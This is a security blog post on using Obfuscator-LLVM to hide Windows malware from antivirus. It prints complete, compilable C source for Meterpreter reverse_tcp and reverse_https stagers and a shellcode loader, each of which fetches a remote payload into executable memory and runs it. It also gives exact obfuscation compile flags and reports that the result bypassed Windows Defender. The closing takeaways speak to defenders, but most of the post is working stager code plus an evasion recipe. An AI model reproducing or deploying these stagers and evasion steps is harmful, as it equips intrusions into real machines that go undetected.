Automated Obfuscation of Windows Malware and Exploits Using O-LLVM

Wade Ma
Mar 3, 2020

Updated: Nov 14, 2024

Intro

I was thinking over how easily Meterpreter stagers can be statically detected nowadays by commercial antivirus (AV) scanners and online tools like VirusTotal. The stagers can be easily detected even when using msfvenom’s built-in encoders/encryptors or the techniques of evasion frameworks, such as Veil. Then I came across a talk by Calle Svensson regarding source code obfuscation using an open-source solution, Obfuscator-LLVM. It looked like a simple and automated obfuscation tool compatible with Windows, so I thought I would give it a test run and blog about it.

Prerequisite Installs:

1. Git (https://git-scm.com/download/win)

2. CMake (https://cmake.org/download/)

Make sure the default option, "Do not add CMake to the system PATH," is unselected, and add CMake to the system PATH for either all users or the current user.

3. mingw-w64 (http://mingw-w64.org/doku.php/download)

These are my MinGW-W64 settings. Also, don’t forget to add the /bin directory of your MinGW install to the PATH variable for your Windows environment. To edit your environment variables, right-click This PC, select Properties, select Advanced system settings, select Environment Variables…, and then edit one of the Path variables.

Now open a PowerShell or cmd.exe prompt, navigate to the directory where you want to install the obfuscator, and enter the following commands:

git clone -b llvm-4.0 https://github.com/obfuscator-llvm/obfuscator.git
cd obfuscator
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -G "MinGW Makefiles" ../
mingw32-make.exe -j7

I got an error after the make command.

mingw32-make: *** [Makefile:151: all] Error 2

However, the clang.exe and clang++.exe binaries were both built successfully in the obfuscator\build\bin directory, so I ignored the make error.

I also added my obfuscator\build\bin directory to the PATH variable for my Windows environment.

Obfuscator-LLVM enables the automated use of 3 stackable methods of obfuscation:

1. Bogus Control Flow (-mllvm -bcf, -mllvm -bcf_loop=3, -mllvm -bcf_prob=40).

Note: Large probabilities, such as -mllvm -bcf -mllvm -bcf_prob=100, require an aesSeed, such as -mllvm -aesSeed=DEADBEEFDEADCODEDEADBEEFDEADCODE, in non-Unix-like environments. Otherwise, you’ll be spammed with Cannot open /dev/random errors as seen below:

Also, you can dynamically input aesSeed values to programmatically generate unique binaries.

2. Control Flow Flattening (-mllvm -fla, -mllvm -split, -mllvm -split_num=3). Calle gives a good description of this type of obfuscation in his talk. Your code’s control flow becomes like a looping fork.

3. Instructions Substitution (-mllvm -sub, -mllvm -sub_loop=3)
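To make the second and third transformations concrete, here is a small hand-written sketch in C. It is not output from Obfuscator-LLVM, and the function names are hypothetical. It only shows the general shape: a flattened function routes every basic block through one dispatcher loop, and a substituted instruction replaces a simple operation (here a + b) with an equivalent but less obvious one (a - (-b)).

```c
/* Original: straightforward control flow. */
int clamp_sum(int a, int b)
{
    int r = a + b;
    if (r > 100)
        r = 100;
    return r;
}

/* Hand-flattened equivalent (illustrative only). Each basic block becomes
 * a case in a dispatcher loop, and a state variable selects the next block. */
int clamp_sum_flattened(int a, int b)
{
    int state = 0;
    int r = 0;

    for (;;) {
        switch (state) {
        case 0: /* entry block; a + b is rewritten as a - (-b) */
            r = a - (-b);
            state = (r > 100) ? 1 : 2;
            break;
        case 1: /* "then" block */
            r = 100;
            state = 2;
            break;
        default: /* exit block */
            return r;
        }
    }
}

/* Returns 1 if both versions agree on a range of small inputs
 * (small enough that neither expression overflows). */
int flattening_preserves_behavior(void)
{
    int a, b;

    for (a = -50; a <= 150; a += 7)
        for (b = -50; b <= 150; b += 11)
            if (clamp_sum(a, b) != clamp_sum_flattened(a, b))
                return 0;
    return 1;
}
```

Both functions return the same values, but the second one no longer has an obvious if/then shape in a disassembler's graph view. The real tool applies this kind of rewrite automatically and far more aggressively.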

Obfuscator-LLVM is built on LLVM and applies its transformations to LLVM's intermediate representation (IR), which sits between system-level languages (such as C, C++, and Rust) and assembly. Thus, I needed some source code to play around with.

After some Googling, I was able to re-create trimmed-down C source versions of Meterpreter’s reverse-tcp and reverse-https stagers.

Each one is compilable on Windows using the MinGW toolchain with the following commands:

gcc.exe -static reverse_tcp.c -o reverse_tcp.exe -lws2_32
clang.exe -static reverse_tcp.c -o reverse_tcp.exe -lws2_32
gcc.exe -static reverse_https.c -o reverse_https.exe -lwininet
clang.exe -static reverse_https.c -o reverse_https.exe -lwininet

// reverse_tcp.c
#include <stdlib.h>
#include <stdio.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <unistd.h>

#define DEFAULT_BUFLEN 512

// https://docs.microsoft.com/en-us/windows/win32/winsock/complete-client-code
int __cdecl main(int argc, char **argv)
{
    char remote_ip[] = "127.0.0.1";
    char remote_port[] = "443";
    
    WSADATA wsaData;
    SOCKET ConnectSocket = INVALID_SOCKET;
    
    struct addrinfo *result = NULL,
    *ptr = NULL,
    hints;
    unsigned char *buffer;
        
int iResult;
int size = 0;

// Initialize Winsock
iResult = WSAStartup(MAKEWORD(2,2), &wsaData);

if (iResult != 0) {
    printf("WSAStartup failed: %d\n", iResult);
    return 1;
    }
    
  ZeroMemory( &hints, sizeof(hints) );
  hints.ai_family = AF_UNSPEC;
  hints.ai_socktype = SOCK_STREAM;
  hints.ai_protocol = IPPROTO_TCP;
  
// Resolve the server address and port
iResult = getaddrinfo(remote_ip, remote_port, &hints, &result);

if ( iResult != 0 ) {
    printf("getaddrinfo failed: %d\n", iResult);
    WSACleanup();
    return 1;
    }

// Attempt to connect to an address until one succeeds
for(ptr=result; ptr != NULL ;ptr=ptr->ai_next) {
    // Create a SOCKET for connecting to server
    ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,
    ptr->ai_protocol);

    if (ConnectSocket == INVALID_SOCKET) {
        printf("socket failed with error: %d\n", WSAGetLastError());
        WSACleanup();
        return 1;
        }

// Connect to server.
iResult = connect( ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);

if (iResult == SOCKET_ERROR) {
    closesocket(ConnectSocket);
    ConnectSocket = INVALID_SOCKET;
    continue;
    }

break;
  }

freeaddrinfo(result);

if (ConnectSocket == INVALID_SOCKET) {
    printf("Unable to connect to server\n");
    WSACleanup();
    return 1;
  }

// https://blog.cobaltstrike.com/2013/06/28/staged-payloads-what-pen-testers-should-know/
// read the 4-byte length
int count = recv(ConnectSocket, (char *)&size, 4, 0);

if (count != 4 || size <= 0) {
    printf("Unable to read payload size\n");
    }

//https://github.com/SherifEldeeb/inmet/blob/master/inmet/winsock_functions.cpp
buffer = (unsigned char*)VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
buffer[0] = 0xBF;

// copy the value of our socket to the buffer
memcpy(buffer + 1, &ConnectSocket, 4);

// https://github.com/SherifEldeeb/inmet/blob/master/inmet/winsock_functions.cpp
int received_bytes = 0;
int bytes_left = size;
int index = 0;

do {
    received_bytes = 0;
    received_bytes = recv(ConnectSocket, ((char*)(buffer + 5 + index)), bytes_left, 0);
    index += received_bytes;
    bytes_left -= received_bytes;
    } 
    while (bytes_left > 0);
    void (*ret)() = (void(*)())buffer;
    ret();
    
// cleanup
closesocket(ConnectSocket);
WSACleanup();
return 0;
}

 // reverse_https.c
#include <stdlib.h>
#include <stdio.h>
#include <windows.h>
#include <wininet.h>
#include <unistd.h>
#include <time.h>

#define DEFAULT_CHECKSUM_LEN 224

// https://www.veil-framework.com/veil-framework-2-4-0-reverse-http/
// https://github.com/SherifEldeeb/inmet/blob/master/inmet/HTTP_Functions.cpp
int checksum8(char *s)
{
    int i;
    int sum = 0;
    for(i = 0; i < strlen(s); i++)
    {
        sum += (int)s[i];
        }
        return sum % 0x100;
        }

// https://www.veil-framework.com/veil-framework-2-4-0-reverse-http/
// https://cboard.cprogramming.com/c-programming/167590-c-program-generate-array[5]-random-characters-composed-z-0-9-a.html

void genHTTPChecksum(char *s)
{
    int i;
    int checksum;
    srand(time(0));
    char cks[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_";
    char test_string[DEFAULT_CHECKSUM_LEN] = {0};
    
    while(1) {
        for (i=0; i < DEFAULT_CHECKSUM_LEN-1; i++)
        test_string[i]=cks[(rand() % strlen(cks))];
        checksum = checksum8(test_string);

        if (checksum == 92) break;
        }

strncpy(s, test_string, strlen(test_string));
return;
}

int __cdecl main(int argc, char **argv)
{
    char remote_ip[] = "127.0.0.1";
    int remote_port = 443;
    char user_agent[] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36";
    char checksum_str[DEFAULT_CHECKSUM_LEN] = {0};
    char url[DEFAULT_CHECKSUM_LEN+1] = {0};
    unsigned char *buffer;

    int sec_option_flags = 0;
    genHTTPChecksum(checksum_str);
    
// https://github.com/SherifEldeeb/inmet/blob/master/inmet/HTTP_Functions.cpp
strncpy(url, "/", 1);
strncat(url, checksum_str, strlen(checksum_str));
HINTERNET hInternetOpen = InternetOpen(user_agent, INTERNET_OPEN_TYPE_PRECONFIG, 0, 0, 0);
HINTERNET hInternetConnect = InternetConnect(hInternetOpen, remote_ip, remote_port, 0, 0, INTERNET_SERVICE_HTTP, 0, 0);
HINTERNET hHTTPOpenRequest = HttpOpenRequest(hInternetConnect, "GET", url, 0, 0, 0, INTERNET_FLAG_RELOAD | \
INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI | INTERNET_FLAG_SECURE | \
INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_UNKNOWN_CA, 0);
sec_option_flags = SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_WRONG_USAGE | SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_REVOCATION;

InternetSetOption(hHTTPOpenRequest, INTERNET_OPTION_SECURITY_FLAGS, &sec_option_flags, sizeof(sec_option_flags));
HttpSendRequest(hHTTPOpenRequest, 0, 0, 0, 0);
buffer = (unsigned char*)VirtualAlloc(0, (4096*1024), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
DWORD bytesread = 0;
DWORD byteswritten = 0;

while (InternetReadFile(hHTTPOpenRequest, (buffer + byteswritten), 4096, &bytesread) && bytesread > 0)
  {
    byteswritten += bytesread;
  }

void (*ret)() = (void(*)())buffer;
ret();
return 0;
}

The above C code can be repurposed for your use cases. Here are a few notes about the protocols the above stagers use to connect back to the multi/handler.

1. reverse_tcp.c: On connect back, the multi/handler sends a 4-byte value holding the size of its payload, followed by the payload itself. The payload expects the client’s socket handle to be in the EDI register, which is why the stager writes 0xBF (the opcode for mov edi, imm32) and the socket value in front of the payload. The client then executes the payload.

2. reverse_https.c: The multi/handler waits to receive an HTTPS GET request from the client. The requested URI, without its leading “/”, must have a “checksum” of 92. This “checksum” is calculated as follows: sum the ordinal values of the ASCII characters in the URI (without the leading “/”) and take that sum modulo 256 (0x100).
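The checksum rule in the second note is simple enough to check by hand, for example when reviewing proxy or web server logs for stager-style requests. Below is a minimal sketch in C. The function names are hypothetical, the value 92 is the one given above, and the handler's minimum URI length is not modeled.

```c
#include <stddef.h>

/* Sum of the byte values in s, modulo 256 (0x100). */
int uri_checksum8(const char *s)
{
    unsigned int sum = 0;
    size_t i;

    for (i = 0; s[i] != '\0'; i++)
        sum += (unsigned char)s[i];
    return (int)(sum % 0x100);
}

/* Returns 1 if the path, ignoring one leading '/', has a checksum of 92. */
int uri_matches_stager_checksum(const char *path)
{
    if (path[0] == '/')
        path++;
    return uri_checksum8(path) == 92;
}
```

For example, "ttt" sums to 3 * 116 = 348, and 348 modulo 256 is 92, so "/ttt" passes the checksum test. A path such as "/index.html" sums to 1019, which is 251 modulo 256, so it does not.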

An important aside: I noticed that the multi/handler would not send the payload to the client if the URI was short, even when it satisfied the “checksum.” The multi/handler requires a minimum URI length before it treats the client's connect-back HTTPS GET request as valid. I did not see this minimum length requirement documented anywhere. I found it by debugging working msfvenom shellcode and noticing the HTTPS GET request for the URI

/ZdLxi-iG1OLnsOaxub_ylwU0fuPp98HjagrqZzOf1hFLSRPQOKD0kEg2VdrBN8C9MBtncADAXIsfJXsgO3Uljm9yT15vXo8tAf94YfwgjO32zthgAHV--MlEUFbFMX3zx-yELf7GL319JO7NjVk1L_2O6twhZfaHuXuCl19dADUgKO0LimX0RZJLunl26ZCeBgvUUByCoKGsb1jpKCraYa80vXJwAu4.

Below is a screenshot of me breaking at the call to HttpOpenRequest to view the GET URI requested in msfvenom reverse_https shellcode.

Back to my attempt at obfuscating code. I decided to use the source code of Raphael Mudge’s loader.exe to test Obfuscator-LLVM’s abilities. Raphael Mudge’s loader.exe (https://blog.cobaltstrike.com/2012/09/13/a-loader-for-metasploits-meterpreter/) is already detected by multiple vendors on VirusTotal.

It is also detected by Windows Defender.

Also, a view of the control flow of loader.exe:

For obfuscation, I ran a version of the "Full Protection" discussed in this blog post, https://blog.quarkslab.com/deobfuscation-recovering-an-ollvm-protected-program.html.

I also added dead code to the source of loader.exe. As Calle noted in his talk, dead code enhances the obfuscation effects of Obfuscator-LLVM. I compiled main.c using the O-LLVM options below:

clang.exe -static main.c -o test_01.exe -lws2_32 -mllvm -bcf -mllvm -bcf_prob=100 -mllvm -bcf_loop=1 -mllvm -sub -mllvm -sub_loop=3 -mllvm -fla -mllvm -split_num=10 -mllvm -aesSeed=DEADBEEFDEADCODEDEADBEEFDEADCODE

/*
 * A C-based stager client compatibility with the Metasploit Framework
 * based on a discussion on the Metasploit Framework mailing list
 *
 * @author Raphael Mudge (raffi@strategiccyber.com)
 * @license BSD License.
 *
 * Relevant messages:
 * http://mail.metasploit.com/pipermail/framework/2012-September/008660.html
 * http://mail.metasploit.com/pipermail/framework/2012-September/008664.html
 */

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>

/* init winsock */
void winsock_init() {
       WSADATA      wsaData;
       WORD         wVersionRequested;
       wVersionRequested = MAKEWORD(2, 2);

       if (WSAStartup(wVersionRequested, &wsaData) < 0) {
              printf("ws2_32.dll is out of date.\n");
              WSACleanup();
              exit(1);
       }
}

/* a quick routine to quit and report why we quit */
void punt(SOCKET my_socket, char * error) {
       printf("Bad things: %s\n", error);
       closesocket(my_socket);
       WSACleanup();
       exit(1);
}

/* attempt to receive all of the requested data from the socket */
int recv_all(SOCKET my_socket, void * buffer, int len) {
       int    tret   = 0;
       int    nret   = 0;
       char * startb = buffer;
       while (tret < len) {
              nret = recv(my_socket, (char *)startb, len - tret, 0);
              startb += nret;
              tret   += nret;

              if (nret == SOCKET_ERROR)
                     punt(my_socket, "Could not receive data");
       }

       return tret;
}

/* establish a connection to a host:port */
SOCKET wsconnect(char * targetip, int port) {
       struct hostent *           target;
       struct sockaddr_in sock;
       SOCKET                     my_socket;

       /* setup our socket */
       my_socket = socket(AF_INET, SOCK_STREAM, 0);
       if (my_socket == INVALID_SOCKET)
              punt(my_socket, "Could not initialize socket");

       /* resolve our target */
       target = gethostbyname(targetip);
       if (target == NULL)
              punt(my_socket, "Could not resolve target");

       /* copy our target information into the sock */
       memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);
       sock.sin_family = AF_INET;
       sock.sin_port = htons(port);

       /* attempt to connect */
       if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )
              punt(my_socket, "Could not connect to target");
       return my_socket;
}

int main(int argc, char * argv[]) {
    // DEAD CODE THAT DOES NOTHING BUT ENHANCE OBFUSCATION
    unsigned int n;
    unsigned int mod = n % 4;
    unsigned int res = 0;

  if (mod == 0) res = (n | 0xBAAAD0BF) * (2 ^ n);
  else if (mod == 1) res = (n & 0xBAAAD0BF) * (3 + n);
  else if (mod == 2) res = (n ^ 0xBAAAD0BF) * (4 | n);
  else res = (n + 0xBAAAD0BF) * (5 & n);

  if (mod == 0) res = (n | 0xBAAAD0BF) * (2 ^ n);
  else if (mod == 1) res = (n & 0xBAAAD0BF) * (3 + n);
  else if (mod == 2) res = (n ^ 0xBAAAD0BF) * (4 | n);
  else res = (n + 0xBAAAD0BF) * (5 & n);

  if (mod == 0) res = (n | 0xBAAAD0BF) * (2 ^ n);
  else if (mod == 1) res = (n & 0xBAAAD0BF) * (3 + n);
  else if (mod == 2) res = (n ^ 0xBAAAD0BF) * (4 | n);
  else res = (n + 0xBAAAD0BF) * (5 & n);

  if (mod == 0) res = (n | 0xBAAAD0BF) * (2 ^ n);
  else if (mod == 1) res = (n & 0xBAAAD0BF) * (3 + n);
  else if (mod == 2) res = (n ^ 0xBAAAD0BF) * (4 | n);
  else res = (n + 0xBAAAD0BF) * (5 & n);

  n = res;
  ULONG32 size;
  char * buffer;

  void (*function)();
  winsock_init();
  if (argc != 3) {
         printf("%s [host] [port]\n", argv[0]);
         exit(1);
  }

  /* connect to the handler */
  SOCKET my_socket = wsconnect(argv[1], atoi(argv[2]));

  /* read the 4-byte length */
  int count = recv(my_socket, (char *)&size, 4, 0);
  if (count != 4 || size <= 0)
         punt(my_socket, "read a strange or incomplete length value\n");
 
  /* allocate a RWX buffer */
  buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

  if (buffer == NULL)
    punt(my_socket, "could not allocate buffer\n");
    buffer[0] = 0xBF;
    
/* copy the value of our socket to the buffer */
memcpy(buffer + 1, &my_socket, 4);

/* read bytes into the buffer */
count = recv_all(my_socket, buffer + 5, size);

/* cast our buffer as a function and call it */
function = (void (*)())buffer;
function();
 return 0;
}

Afterward, I viewed the control flow of the new binary in IDA. As expected, it was heavily obfuscated.

Also as expected, the new binary, which has the same behavior as loader.exe but is enhanced with automated obfuscation, was detected by only a few vendors on VirusTotal and bypassed Windows Defender.

Key Takeaways: Today’s malware authors and exploit developers have automated methods of obfuscating their software. When these techniques are combined with other techniques (such as encryption and packers), they make automated and manual analysis very difficult. Static detection and blacklisting signatures are highly ineffective against them. YARA rules based on static signatures of assembly instructions can be easily circumvented by a tool like O-LLVM. A great use case for O-LLVM would be to inject hidden program functionality into an otherwise normal user program. O-LLVM makes it hard to reverse the full functionality of executable code. I believe the keys to combating code obfuscation techniques are leveraging user behavioral analytics and Artificial Intelligence solutions (for example, CrowdStrike Falcon and IBM QRadar Advisor with Watson).

Closing Remarks:

I went over a few Meterpreter payload detector tools (Antimeter, Anti-Pwny, and Meterpreter Payload Detection) with a colleague. It would be an interesting follow-up to rebuild the source code of Meterpreter (https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter) using O-LLVM and see how that fares against in-memory detection tools.

Bio: Wade is a GCIH who plays CTFs.
